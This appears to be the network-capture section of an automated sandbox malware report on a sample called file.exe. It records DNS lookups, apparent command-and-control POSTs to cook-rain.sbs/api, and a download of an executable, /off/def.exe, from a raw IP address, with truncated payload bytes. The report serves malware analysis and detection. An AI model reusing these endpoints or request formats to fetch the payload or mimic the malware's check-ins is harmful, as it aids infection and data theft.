                                                                                                                                                                                                            Nov 22, 2024 04:26:32.439115047 CET53617381.1.1.1192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:35.685792923 CET53528311.1.1.1192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:36.752795935 CET5711753192.168.2.41.1.1.1
                                                                                                                                                                                                            Nov 22, 2024 04:26:36.752979994 CET5496953192.168.2.41.1.1.1
                                                                                                                                                                                                            Nov 22, 2024 04:26:36.889576912 CET53549691.1.1.1192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:36.889681101 CET53571171.1.1.1192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.818161964 CET6266253192.168.2.41.1.1.1
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.818336010 CET6109253192.168.2.41.1.1.1
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.307754040 CET6531653192.168.2.41.1.1.1
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.307971954 CET5210653192.168.2.41.1.1.1
                                                                                                                                                                                                            Nov 22, 2024 04:26:47.687484026 CET53641761.1.1.1192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:49.709532976 CET5070653192.168.2.41.1.1.1
                                                                                                                                                                                                            Nov 22, 2024 04:26:49.709686995 CET4988153192.168.2.41.1.1.1
                                                                                                                                                                                                            Nov 22, 2024 04:26:52.752640963 CET53497771.1.1.1192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:11.722755909 CET53562001.1.1.1192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:32.156177044 CET53532691.1.1.1192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:34.709284067 CET53639091.1.1.1192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.912360907 CET53534541.1.1.1192.168.2.4
                                                                                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                            Nov 22, 2024 04:26:40.302732944 CET192.168.2.41.1.1.1c2c1(Port unreachable)Destination Unreachable
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.977353096 CET192.168.2.41.1.1.1c29c(Port unreachable)Destination Unreachable
                                                                                                                                                                                                            Nov 22, 2024 04:26:54.259344101 CET192.168.2.41.1.1.1c264(Port unreachable)Destination Unreachable
                                                                                                                                                                                                            Nov 22, 2024 04:28:02.096211910 CET192.168.2.41.1.1.1c233(Port unreachable)Destination Unreachable
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                            Nov 22, 2024 04:25:57.186382055 CET192.168.2.41.1.1.10x19a3Standard query (0)cook-rain.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:36.752795935 CET192.168.2.41.1.1.10x2cbStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:36.752979994 CET192.168.2.41.1.1.10xf976Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.818161964 CET192.168.2.41.1.1.10x28f0Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.818336010 CET192.168.2.41.1.1.10x20e0Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.307754040 CET192.168.2.41.1.1.10x3cd8Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.307971954 CET192.168.2.41.1.1.10xf854Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:49.709532976 CET192.168.2.41.1.1.10xb14eStandard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:49.709686995 CET192.168.2.41.1.1.10x360Standard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                            Nov 22, 2024 04:25:57.327611923 CET1.1.1.1192.168.2.40x19a3No error (0)cook-rain.sbs172.67.155.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:25:57.327611923 CET1.1.1.1192.168.2.40x19a3No error (0)cook-rain.sbs104.21.66.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:36.889576912 CET1.1.1.1192.168.2.40xf976No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:36.889681101 CET1.1.1.1192.168.2.40x2cbNo error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.956878901 CET1.1.1.1192.168.2.40x28f0No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.956878901 CET1.1.1.1192.168.2.40x28f0No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.956878901 CET1.1.1.1192.168.2.40x28f0No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:39.956878901 CET1.1.1.1192.168.2.40x28f0No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:40.151021004 CET1.1.1.1192.168.2.40x2ee6No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:40.257729053 CET1.1.1.1192.168.2.40xe94bNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:40.257729053 CET1.1.1.1192.168.2.40xe94bNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:40.257729053 CET1.1.1.1192.168.2.40xe94bNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:40.302640915 CET1.1.1.1192.168.2.40x20e0No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:40.302640915 CET1.1.1.1192.168.2.40x20e0No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.371594906 CET1.1.1.1192.168.2.40xdfeNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.371859074 CET1.1.1.1192.168.2.40x8659No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.371859074 CET1.1.1.1192.168.2.40x8659No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.371859074 CET1.1.1.1192.168.2.40x8659No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.444364071 CET1.1.1.1192.168.2.40x3cd8No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.444364071 CET1.1.1.1192.168.2.40x3cd8No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.444364071 CET1.1.1.1192.168.2.40x3cd8No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.444364071 CET1.1.1.1192.168.2.40x3cd8No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.447254896 CET1.1.1.1192.168.2.40xf854No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:43.447254896 CET1.1.1.1192.168.2.40xf854No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:49.852308035 CET1.1.1.1192.168.2.40x360No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:49.937115908 CET1.1.1.1192.168.2.40xb14eNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:54.187036991 CET1.1.1.1192.168.2.40x1fe6No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:26:54.255575895 CET1.1.1.1192.168.2.40xd722No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:27:00.957685947 CET1.1.1.1192.168.2.40xd370No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 22, 2024 04:27:00.957732916 CET1.1.1.1192.168.2.40xd55cNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            • cook-rain.sbs
                                                                                                                                                                                                            • slscr.update.microsoft.com
                                                                                                                                                                                                            • fs.microsoft.com
                                                                                                                                                                                                            • https:
                                                                                                                                                                                                              • js.monitor.azure.com
                                                                                                                                                                                                              • wcpstatic.microsoft.com
                                                                                                                                                                                                            • otelrules.azureedge.net
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.449744185.215.113.16806568C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 22, 2024 04:26:21.426232100 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.804771900 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:22 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 2721792
                                                                                                                                                                                                            Last-Modified: Fri, 22 Nov 2024 03:06:55 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "673ff54f-298800"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 05 bd 29 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ @*)`Ui` @ @.rsrc`2@.idata 8@mjddytxu@)():@vefxxbiz )b)@.taggant@*"f)@
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.804811001 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.804902077 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.804949045 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.804958105 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.804970026 CET24INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.805366993 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.805389881 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.805398941 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.806118965 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.924552917 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.449730172.67.155.2484436568C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:25:58 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                            2024-11-22 03:25:58 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                            2024-11-22 03:25:59 UTC1009INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:25:59 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=2eqlmad19df4qdbkh1151u97dt; expires=Mon, 17-Mar-2025 21:12:38 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bYQ%2BnjYoQt8GuliB0SBAg6dwwSGHo%2FrE987f8NpnhrfL941OUsnzt7wacmPpyxib8xqMUB3LhIBNwj7CZCNfKI6hH%2B5%2FVResmlECM%2FRE9Ugm82nQKeNY2%2ByCaqzIEZHO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e65d0bb0a284210-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1770&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=904&delivery_rate=1668571&cwnd=243&unsent_bytes=0&cid=4adf53c064816feb&ts=729&x=0"
                                                                                                                                                                                                            2024-11-22 03:25:59 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                            2024-11-22 03:25:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.449731172.67.155.2484436568C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:00 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 53
                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                            2024-11-22 03:26:00 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                            2024-11-22 03:26:01 UTC1003INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:01 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=i75to60u5tmj7el3p2gm42d7ec; expires=Mon, 17-Mar-2025 21:12:40 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mTOa%2BU%2FePdBzTcAT90YfQCgWQX8pIVRuuT3SbI%2BqBYJC4ArVvpbbRfiHvKPdFFANAG96ot6BgN18Rc59j8NKawBRag9h7Eonz7TQYisYVvQHtpgcifMckQMAUC1Tknzq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e65d0c7b9a4434f-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=950&delivery_rate=1725768&cwnd=221&unsent_bytes=0&cid=8eb034bfcf47b437&ts=738&x=0"
                                                                                                                                                                                                            2024-11-22 03:26:01 UTC366INData Raw: 34 34 36 63 0d 0a 36 66 77 33 54 2f 38 30 59 66 6d 47 49 43 5a 52 56 59 71 48 62 6c 5a 4d 79 51 6f 77 54 30 45 4c 4b 72 54 53 4b 68 6f 75 67 61 65 53 33 6b 46 74 78 51 42 4e 32 2f 56 46 42 47 73 68 2b 50 49 4c 65 6d 36 6f 62 68 4a 31 4a 32 70 47 78 37 63 47 4f 46 6a 73 68 64 4f 61 56 69 4f 4d 55 55 33 62 34 31 67 45 61 77 37 78 70 51 73 34 62 76 4d 6f 56 53 55 6a 61 6b 62 57 73 30 46 31 58 75 33 45 67 5a 42 51 4a 35 70 58 42 5a 6a 71 54 55 4d 30 4d 4f 76 74 41 44 38 68 6f 57 63 53 59 32 4e 75 55 4a 62 6f 43 46 64 4c 39 63 61 6b 6e 55 51 6b 33 55 6c 4e 67 71 52 46 53 48 4e 76 71 4f 59 4c 4e 43 43 76 62 6c 73 6e 4b 57 4e 4f 31 37 5a 41 61 6b 66 6e 7a 34 47 65 55 79 61 51 58 68 47 56 34 45 70 49 4d 6a 72 72 70 55 4a 30 4b 62 4d 6f 43 6d 31 77 57 30 76 48 6f
                                                                                                                                                                                                            Data Ascii: 446c6fw3T/80YfmGICZRVYqHblZMyQowT0ELKrTSKhougaeS3kFtxQBN2/VFBGsh+PILem6obhJ1J2pGx7cGOFjshdOaViOMUU3b41gEaw7xpQs4bvMoVSUjakbWs0F1Xu3EgZBQJ5pXBZjqTUM0MOvtAD8hoWcSY2NuUJboCFdL9caknUQk3UlNgqRFSHNvqOYLNCCvblsnKWNO17ZAakfnz4GeUyaQXhGV4EpIMjrrpUJ0KbMoCm1wW0vHo
                                                                                                                                                                                                            2024-11-22 03:26:01 UTC1369INData Raw: 37 41 45 35 4c 71 5a 69 58 53 34 6a 62 6b 4c 63 76 30 4a 38 51 65 37 44 69 35 34 56 59 39 31 52 47 39 75 38 41 6d 63 32 4a 2b 2f 70 47 6e 59 55 36 33 63 63 4e 47 4e 75 52 4a 62 6f 43 48 42 4a 34 4d 61 41 6b 56 59 6c 6c 6b 51 44 69 65 4a 50 51 53 45 78 37 65 73 47 4e 7a 79 68 5a 6c 51 75 4b 6d 4a 42 30 37 64 4d 4f 41 4b 6a 77 70 50 65 44 57 32 38 57 77 69 58 37 6c 56 45 63 79 69 6d 2f 45 77 7a 49 75 73 77 45 69 6b 69 62 55 6e 53 76 6b 5a 38 51 4f 58 4c 68 70 46 54 4a 35 31 52 43 5a 50 73 51 30 6b 34 4f 4f 6a 67 41 54 41 6f 70 32 6c 58 62 57 30 70 54 38 37 77 45 44 68 69 35 4d 61 5a 33 47 41 75 6b 31 67 45 6a 61 52 64 43 69 70 33 37 2b 6c 4d 62 47 36 6c 62 56 30 2f 49 6e 74 4e 32 4b 4a 45 66 55 72 75 78 6f 57 65 55 43 71 51 57 41 57 63 35 30 70 41 4d 6a 6e
                                                                                                                                                                                                            Data Ascii: 7AE5LqZiXS4jbkLcv0J8Qe7Di54VY91RG9u8Amc2J+/pGnYU63ccNGNuRJboCHBJ4MaAkVYllkQDieJPQSEx7esGNzyhZlQuKmJB07dMOAKjwpPeDW28WwiX7lVEcyim/EwzIuswEikibUnSvkZ8QOXLhpFTJ51RCZPsQ0k4OOjgATAop2lXbW0pT87wEDhi5MaZ3GAuk1gEjaRdCip37+lMbG6lbV0/IntN2KJEfUruxoWeUCqQWAWc50pAMjn
                                                                                                                                                                                                            2024-11-22 03:26:01 UTC1369INData Raw: 47 36 6e 59 56 49 6d 4b 57 31 49 30 62 31 4e 65 30 76 67 79 49 79 55 57 79 71 5a 57 67 71 57 34 6b 4a 44 4e 7a 4c 36 34 41 55 34 49 75 73 6d 45 69 6f 37 4b 52 43 57 6e 30 39 75 54 38 7a 47 6d 70 63 56 4d 74 4e 50 51 35 7a 6f 41 68 78 7a 4d 4f 33 74 42 7a 49 6d 71 33 70 58 49 79 68 6f 51 74 43 78 52 58 52 4b 34 38 53 4c 6d 46 6b 74 6d 6c 45 52 69 65 46 45 56 6a 6c 33 70 71 55 4c 4c 47 37 7a 4b 47 51 39 4e 48 68 65 6c 49 56 4c 64 6b 4c 6b 30 38 75 42 47 7a 54 64 55 51 2f 62 76 41 4a 50 4d 7a 76 76 37 51 6f 77 4a 71 52 6e 57 7a 38 69 5a 55 62 45 74 30 68 78 51 75 7a 4a 67 70 4e 53 49 4a 5a 63 44 70 2f 6a 51 77 52 39 64 2b 2f 39 54 47 78 75 6e 58 68 66 49 51 31 69 52 4e 2f 77 56 7a 5a 56 6f 38 4b 48 33 67 31 74 6d 56 6f 4c 6b 65 74 4c 54 6a 6b 34 34 65 55 45
                                                                                                                                                                                                            Data Ascii: G6nYVImKW1I0b1Ne0vgyIyUWyqZWgqW4kJDNzL64AU4IusmEio7KRCWn09uT8zGmpcVMtNPQ5zoAhxzMO3tBzImq3pXIyhoQtCxRXRK48SLmFktmlERieFEVjl3pqULLG7zKGQ9NHhelIVLdkLk08uBGzTdUQ/bvAJPMzvv7QowJqRnWz8iZUbEt0hxQuzJgpNSIJZcDp/jQwR9d+/9TGxunXhfIQ1iRN/wVzZVo8KH3g1tmVoLketLTjk44eUE
